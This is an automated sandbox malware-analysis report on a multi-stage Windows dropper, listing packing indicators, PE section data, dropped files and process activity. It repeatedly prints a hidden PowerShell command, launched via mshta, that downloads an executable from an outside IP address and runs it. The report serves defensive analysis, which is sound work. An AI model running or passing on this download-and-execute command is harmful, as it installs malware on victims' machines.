Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb!! source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *.pdb source: powershell.exe, 00000008.00000002.1818275027.000001F33A157000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2568191876.00007FFE1A519000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: powershell.exe, 00000008.00000002.1811545878.000001F339E20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp

Source: 5c9465cda4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5c9465cda4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5c9465cda4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5c9465cda4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5c9465cda4.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Unpacked PE file: 10.2.TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 11.2.rapes.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 12.2.rapes.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Unpacked PE file: 13.2.TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Unpacked PE file: 46.2.TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Unpacked PE file: 48.2.TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Unpacked PE file: 64.2.df7baf8347.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lrekyrul:EW;zbmmodzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lrekyrul:EW;zbmmodzy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 65.2.483d2fa8a0d53818306efeb32d3.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oyvtxmua:EW;kyyzokvg:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[1].exe1.20.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: a0b9927072.exe.20.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: ce4pMzk[1].exe.20.dr, Program.cs	.Net Code: Main System.AppDomain.Load(byte[])
Source: ce4pMzk.exe.20.dr, Program.cs	.Net Code: Main System.AppDomain.Load(byte[])
Source: Anubis.exe.28.dr, Program.cs	.Net Code: Main System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

Source: ce4pMzk[1].exe.20.dr

Static PE information: 0xC40E97CE [Mon Mar 26 11:51:42 2074 UTC]

Source: C:\Users\user\Desktop\5c9465cda4.exe

Code function: 0_2_00A742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A742DE

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: _raw_des3.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x1d746
Source: rapes.exe.10.dr	Static PE information: real checksum: 0x1cc6c4 should be: 0x1d1834
Source: _SHA384.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x1655d
Source: zY9sqWs[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x6997b
Source: _cpuid_c.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xdccc
Source: _MD5.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xa544
Source: _SHA224.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x1037a
Source: _raw_ocb.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x11289
Source: f5042cb50f.exe.20.dr	Static PE information: real checksum: 0x47ece6 should be: 0x48392c
Source: _ghash_clmul.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xac61
Source: _raw_ctr.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xdcf9
Source: _keccak.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xdc9d
Source: md.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x45c4
Source: speedups.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xbd62
Source: _BLAKE2s.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x5f6b
Source: _SHA256.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x6eb8
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: real checksum: 0x1cc6c4 should be: 0x1d1834
Source: a0b9927072.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x794ab
Source: _raw_ofb.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x10ea2
Source: _ghash_portable.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xe5b7
Source: ce4pMzk.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x16da4
Source: ce4pMzk[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x16da4
Source: _raw_eksblowfish.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xca96
Source: zY9sqWs.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x6997b
Source: _raw_aesni.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x646e
Source: _cffi.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xac520
Source: df7baf8347.exe.20.dr	Static PE information: real checksum: 0x3c4777 should be: 0x3c6bb6
Source: _raw_cfb.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xed0d
Source: md__mypyc.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x20246
Source: _Salsa20.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xb9f9
Source: pywintypes312.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x24d74
Source: _scrypt.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x4714
Source: random[1].exe0.20.dr	Static PE information: real checksum: 0x3c4777 should be: 0x3c6bb6
Source: random[2].exe.20.dr	Static PE information: real checksum: 0x47ece6 should be: 0x48392c
Source: _strxor.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x48ff
Source: _psutil_windows.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x1f645
Source: _raw_ecb.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x4671
Source: _raw_cbc.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x5ba2
Source: win32api.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x3070b
Source: Anubis.exe.28.dr	Static PE information: real checksum: 0x0 should be: 0x16da4
Source: pythoncom312.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0xb30b9
Source: random[1].exe1.20.dr	Static PE information: real checksum: 0x0 should be: 0x794ab
Source: _SHA1.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xf079
Source: _raw_aes.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xbec9
Source: backend_c.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0x8d663
Source: _SHA512.pyd.24.dr	Static PE information: real checksum: 0x0 should be: 0xdf25

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name:
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: .idata
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name:
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: oyvtxmua
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: kyyzokvg
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: .taggant
Source: rapes.exe.10.dr	Static PE information: section name:
Source: rapes.exe.10.dr	Static PE information: section name: .idata
Source: rapes.exe.10.dr	Static PE information: section name:
Source: rapes.exe.10.dr	Static PE information: section name: oyvtxmua
Source: rapes.exe.10.dr	Static PE information: section name: kyyzokvg
Source: rapes.exe.10.dr	Static PE information: section name: .taggant
Source: SvhQA35[1].exe.20.dr	Static PE information: section name: .eh_fram
Source: SvhQA35[1].exe.20.dr	Static PE information: section name: .xdata
Source: SvhQA35.exe.20.dr	Static PE information: section name: .eh_fram
Source: SvhQA35.exe.20.dr	Static PE information: section name: .xdata
Source: random[1].exe0.20.dr	Static PE information: section name:
Source: random[1].exe0.20.dr	Static PE information: section name: .idata
Source: random[1].exe0.20.dr	Static PE information: section name:
Source: random[1].exe0.20.dr	Static PE information: section name: lrekyrul
Source: random[1].exe0.20.dr	Static PE information: section name: zbmmodzy
Source: random[1].exe0.20.dr	Static PE information: section name: .taggant
Source: df7baf8347.exe.20.dr	Static PE information: section name:
Source: df7baf8347.exe.20.dr	Static PE information: section name: .idata
Source: df7baf8347.exe.20.dr	Static PE information: section name:
Source: df7baf8347.exe.20.dr	Static PE information: section name: lrekyrul
Source: df7baf8347.exe.20.dr	Static PE information: section name: zbmmodzy
Source: df7baf8347.exe.20.dr	Static PE information: section name: .taggant
Source: random[1].exe1.20.dr	Static PE information: section name: .CSS
Source: a0b9927072.exe.20.dr	Static PE information: section name: .CSS
Source: random[2].exe.20.dr	Static PE information: section name:
Source: random[2].exe.20.dr	Static PE information: section name: .idata
Source: random[2].exe.20.dr	Static PE information: section name:
Source: random[2].exe.20.dr	Static PE information: section name: ivrcqqcb
Source: random[2].exe.20.dr	Static PE information: section name: dombjssm
Source: random[2].exe.20.dr	Static PE information: section name: .taggant
Source: f5042cb50f.exe.20.dr	Static PE information: section name:
Source: f5042cb50f.exe.20.dr	Static PE information: section name: .idata
Source: f5042cb50f.exe.20.dr	Static PE information: section name:
Source: f5042cb50f.exe.20.dr	Static PE information: section name: ivrcqqcb
Source: f5042cb50f.exe.20.dr	Static PE information: section name: dombjssm
Source: f5042cb50f.exe.20.dr	Static PE information: section name: .taggant
Source: chromium.exe.24.dr	Static PE information: section name: .eh_fram
Source: chromium.exe.24.dr	Static PE information: section name: .xdata
Source: libcrypto-3.dll.24.dr	Static PE information: section name: .00cfg
Source: libssl-3.dll.24.dr	Static PE information: section name: .00cfg
Source: python312.dll.24.dr	Static PE information: section name: PyRuntim
Source: vcruntime140.dll.24.dr	Static PE information: section name: fothk
Source: vcruntime140.dll.24.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A90A76 push ecx; ret	0_2_00A90A89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00BA3415 pushad ; iretd	5_2_00BA3419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD99920962 push E958F7D0h; ret	8_2_00007FFD999209C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD999F3452 pushfd ; iretd	8_2_00007FFD999F3453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD999F4452 push FFFFFF8Ch; iretd	8_2_00007FFD999F4454
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD999F1D52 push FFFFFFB3h; iretd	8_2_00007FFD999F1D54
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004C4331 push rcx; ret	27_2_00007FFE004C4332

Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: entropy: 7.987492445960321
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE.5.dr	Static PE information: section name: oyvtxmua entropy: 7.953885804216011
Source: rapes.exe.10.dr	Static PE information: section name: entropy: 7.987492445960321
Source: rapes.exe.10.dr	Static PE information: section name: oyvtxmua entropy: 7.953885804216011
Source: random[1].exe0.20.dr	Static PE information: section name: lrekyrul entropy: 7.954913076797239
Source: df7baf8347.exe.20.dr	Static PE information: section name: lrekyrul entropy: 7.954913076797239
Source: random[2].exe.20.dr	Static PE information: section name: ivrcqqcb entropy: 7.9219594299739855
Source: f5042cb50f.exe.20.dr	Static PE information: section name: ivrcqqcb entropy: 7.9219594299739855

Source: random[1].exe1.20.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: random[1].exe1.20.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: a0b9927072.exe.20.dr, GSKpiUyewQVjl3ll2g.cs	High entropy of concatenated method names: 'N64lIWiqvs', 'y3qlLpN8VK', 'ahKlWAIBS3', 'TF7lOb8J3f', 'jgnloPbgcx', 'ra2lnByEPY', 'Gbml9SnirQ', 'XAylfpE7m9', 'wwNljlVFDW', 'qAplaZYBVp'
Source: a0b9927072.exe.20.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'NsqrSNUpN', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe

Process created: "C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe"

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10106730101\a0b9927072.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\python312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ce4pMzk[1].exe	Jump to dropped file
